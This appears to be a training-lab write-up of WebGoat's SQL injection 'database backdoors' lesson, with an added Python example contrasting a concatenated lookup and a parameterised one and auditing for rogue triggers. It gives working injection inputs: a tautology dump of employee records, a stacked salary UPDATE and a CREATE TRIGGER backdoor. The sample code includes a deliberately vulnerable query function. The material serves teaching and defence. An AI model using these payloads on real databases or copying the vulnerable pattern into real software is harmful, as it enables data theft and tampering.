OwaspBWA - Database backdoors

Injection Flaws - Database backdoors


  • input : 101 (a valid user ID)

Result :
User ID  Password  SSN          Salary  E-Mail
101      larry     386-09-5451  55000   larry@stooges.com


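  • input : o
result : Column not found: O in statement
[select userid, password, ssn, salary, email from employee where userid=o]

The error message echoes the whole statement, which exposes the column targets (userid, password, ssn, salary, email) and the table target (employee).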

  • Try an injection
select userid, password, ssn, salary, email from employee where userid=101 or 1=1';

Result :
User ID  Password  SSN           Salary  E-Mail
101      larry     386-09-5451   55000   larry@stooges.com
102      moe       936-18-4524   140000  moe@stooges.com
103      curly     961-08-0047   50000   curly@stooges.com
104      eric      445-66-5565   13000   eric@modelsrus.com
105      tom       792-14-6364   80000   tom@wb.com
106      jerry     858-55-4452   70000   jerry@wb.com
107      david     439-20-9405   100000  david@modelsrus.com
108      bruce     707-95-9482   110000  bruce@modelsrus.com
109      sean      136-55-1046   130000  sean@modelsrus.com
110      joanne    789-54-2413   90000   joanne@modelsrus.com
111      john      129-69-4572   200000  john@guns.com
112      socks     111-111-1111  450000  neville@modelsrus.com

  • Complete injection
105; UPDATE employee SET salary=99999 WHERE userid=105




Stage 2: Use String SQL Injection to inject a backdoor or DB worm

SQL injection statement
105; CREATE TRIGGER myBackDoor
BEFORE INSERT ON employee
FOR EACH ROW BEGIN 
UPDATE employee SET email='john@hackme.com'
WHERE userid = 105


Full SQL query
select userid, password, ssn, salary, email 
from employee 
where userid=105; CREATE TRIGGER myBackDoor 
BEFORE INSERT ON employee 
FOR EACH ROW BEGIN 
UPDATE employee SET email='john@hackme.com'
WHERE userid = 105


Result :
User ID  Password  SSN          Salary  E-Mail
105      tom       792-14-6364  99999   tom@wb.com

*Note* that nothing will actually be executed
because the current underlying DB doesn't support triggers.
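
The concatenated lookup from this lesson next to a hardened one, plus a catalogue audit that flags triggers such as myBackDoor. This is an added example, not code from the lesson or from WebGoat; it assumes an in-memory SQLite database as a stand-in for the lesson DB, and all function names are hypothetical.

```python
import sqlite3

# Constructed sample rows, copied from the result tables on this page.
ROWS = [
    (101, "larry", "386-09-5451", 55000, "larry@stooges.com"),
    (102, "moe", "936-18-4524", 140000, "moe@stooges.com"),
    (105, "tom", "792-14-6364", 80000, "tom@wb.com"),
]
QUERY = "select userid, password, ssn, salary, email from employee where userid="


def make_db():
    """In-memory SQLite stand-in for the lesson database (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table employee (userid integer primary key, "
                 "password text, ssn text, salary integer, email text)")
    conn.executemany("insert into employee values (?, ?, ?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, user_input):
    # Lesson behaviour: the input is concatenated into the statement text.
    return conn.execute(QUERY + user_input).fetchall()


def lookup_hardened(conn, user_input):
    # Accept only an integer ID, then bind it as a parameter so it is never
    # parsed as SQL (no "or 1=1", no stacked UPDATE or CREATE TRIGGER).
    try:
        userid = int(user_input)
    except ValueError:
        raise ValueError("userid must be an integer") from None
    return conn.execute(QUERY + "?", (userid,)).fetchall()


def unexpected_triggers(conn, allowed=()):
    # Audit the schema catalogue for triggers that are not on the allowlist.
    rows = conn.execute(
        "select name, tbl_name from sqlite_master where type = 'trigger'")
    return [(name, table) for name, table in rows if name not in allowed]


def plant_sample_trigger(conn):
    # Constructed: the page's trigger in SQLite syntax, as the audit's target.
    conn.execute("create trigger myBackDoor before insert on employee "
                 "for each row begin update employee "
                 "set email='john@hackme.com' where userid = 105; end")
```

On other database engines the same audit reads that engine's own trigger catalogue instead of sqlite_master.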